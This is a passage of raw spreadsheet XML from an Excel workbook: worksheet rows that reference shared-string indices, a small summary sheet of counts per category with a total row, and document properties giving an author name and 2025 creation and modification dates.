      </c>
      <c r="C350" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D350" s="1" t="s">
        <v>737</v>
      </c>
      <c r="E350" s="1"/>
      <c r="F350" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="351" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A351" s="1" t="s">
        <v>755</v>
      </c>
      <c r="B351" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C351" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D351" s="1" t="s">
        <v>739</v>
      </c>
      <c r="E351" s="1"/>
      <c r="F351" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="352" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A352" s="1" t="s">
        <v>756</v>
      </c>
      <c r="B352" s="1" t="s">
        <v>285</v>
      </c>
      <c r="C352" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D352" s="1" t="s">
        <v>740</v>
      </c>
      <c r="E352" s="1"/>
      <c r="F352" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="353" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A353" s="1" t="s">
        <v>757</v>
      </c>
      <c r="B353" s="1"/>
      <c r="C353" s="1" t="s">
        <v>742</v>
      </c>
      <c r="D353" s="1" t="s">
        <v>741</v>
      </c>
      <c r="E353" s="1"/>
      <c r="F353" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="354" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A354" s="1" t="s">
        <v>758</v>
      </c>
      <c r="B354" s="1"/>
      <c r="C354" s="1" t="s">
        <v>742</v>
      </c>
      <c r="D354" s="1" t="s">
        <v>743</v>
      </c>
      <c r="E354" s="1"/>
      <c r="F354" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="355" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A355" s="1" t="s">
        <v>759</v>
      </c>
      <c r="B355" s="1"/>
      <c r="C355" s="1" t="s">
        <v>742</v>
      </c>
      <c r="D355" s="1" t="s">
        <v>744</v>
      </c>
      <c r="E355" s="1"/>
      <c r="F355" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="356" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A356" s="1" t="s">
        <v>760</v>
      </c>
      <c r="B356" s="1"/>
      <c r="C356" s="1" t="s">
        <v>742</v>
      </c>
      <c r="D356" s="1" t="s">
        <v>745</v>
      </c>
      <c r="E356" s="1"/>
      <c r="F356" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="357" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A357" s="1" t="s">
        <v>761</v>
      </c>
      <c r="B357" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C357" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D357" s="1" t="s">
        <v>746</v>
      </c>
      <c r="E357" s="1"/>
      <c r="F357" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="358" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A358" s="1" t="s">
        <v>762</v>
      </c>
      <c r="B358" s="1"/>
      <c r="C358" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D358" s="1" t="s">
        <v>747</v>
      </c>
      <c r="E358" s="1"/>
      <c r="F358" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="359" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A359" s="1" t="s">
        <v>763</v>
      </c>
      <c r="B359" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C359" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D359" s="1" t="s">
        <v>748</v>
      </c>
      <c r="E359" s="1"/>
      <c r="F359" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="360" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A360" s="1" t="s">
        <v>764</v>
      </c>
      <c r="B360" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C360" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D360" s="1" t="s">
        <v>749</v>
      </c>
      <c r="E360" s="1"/>
      <c r="F360" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="361" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A361" s="1" t="s">
        <v>765</v>
      </c>
      <c r="B361" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C361" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D361" s="1" t="s">
        <v>750</v>
      </c>
      <c r="E361" s="1"/>
      <c r="F361" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="362" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A362" s="1" t="s">
        <v>766</v>
      </c>
      <c r="B362" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C362" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D362" s="1" t="s">
        <v>751</v>
      </c>
      <c r="E362" s="1"/>
      <c r="F362" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="363" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A363" s="1" t="s">
        <v>767</v>
      </c>
      <c r="B363" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C363" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D363" s="1" t="s">
        <v>753</v>
      </c>
      <c r="E363" s="1"/>
      <c r="F363" s="1" t="s">
        <v>738</v>
      </c>
    </row>
    <row r="364" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A364" s="1" t="s">
        <v>768</v>
      </c>
      <c r="B364" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C364" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D364" s="1" t="s">
        <v>752</v>
      </c>
      <c r="E364" s="1"/>
      <c r="F364" s="1" t="s">
        <v>738</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AE45-77D1-0245-9E7B-ECD4B350ABFB}">
  <dimension ref="A3:C14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C21" sqref="C21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="150.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="15.5" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="11" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.5" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="11" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="15.5" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="11" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="15.5" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="11" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="15.5" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="11" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="15.5" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="11" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="15.5" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="11" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="15.5" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="11" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="15.5" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="11" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="15.5" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="11" bestFit="1" customWidth="1"/>
    <col min="24" max="24" width="15.5" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="11" bestFit="1" customWidth="1"/>
    <col min="26" max="26" width="15.5" bestFit="1" customWidth="1"/>
    <col min="27" max="27" width="11" bestFit="1" customWidth="1"/>
    <col min="28" max="28" width="15.5" bestFit="1" customWidth="1"/>
    <col min="29" max="29" width="11" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="15.5" bestFit="1" customWidth="1"/>
    <col min="31" max="31" width="11" bestFit="1" customWidth="1"/>
    <col min="32" max="32" width="20" bestFit="1" customWidth="1"/>
    <col min="33" max="33" width="15.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>279</v>
      </c>
      <c r="B3" t="s">
        <v>281</v>
      </c>
      <c r="C3" t="s">
        <v>769</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B4">
        <v>11</v>
      </c>
      <c r="C4">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>122</v>
      </c>
      <c r="B5">
        <v>7</v>
      </c>
      <c r="C5">
        <v>23</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B6">
        <v>8</v>
      </c>
      <c r="C6">
        <v>17</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B7">
        <v>1</v>
      </c>
      <c r="C7">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>81</v>
      </c>
      <c r="B8">
        <v>2</v>
      </c>
      <c r="C8">
        <v>12</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>95</v>
      </c>
      <c r="B9">
        <v>2</v>
      </c>
      <c r="C9">
        <v>13</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>110</v>
      </c>
      <c r="B10">
        <v>1</v>
      </c>
      <c r="C10">
        <v>14</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>297</v>
      </c>
      <c r="B11">
        <v>21</v>
      </c>
      <c r="C11">
        <v>110</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>523</v>
      </c>
      <c r="B12">
        <v>44</v>
      </c>
      <c r="C12">
        <v>110</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>738</v>
      </c>
      <c r="B13">
        <v>10</v>
      </c>
      <c r="C13">
        <v>15</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>280</v>
      </c>
      <c r="B14">
        <v>107</v>
      </c>
      <c r="C14">
        <v>363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Harvey Wargo</dc:creator>
  <cp:lastModifiedBy>Harvey Wargo</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-26T18:54:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-25T12:52:26Z</dcterms:modified>
</cp:coreProperties>
</file>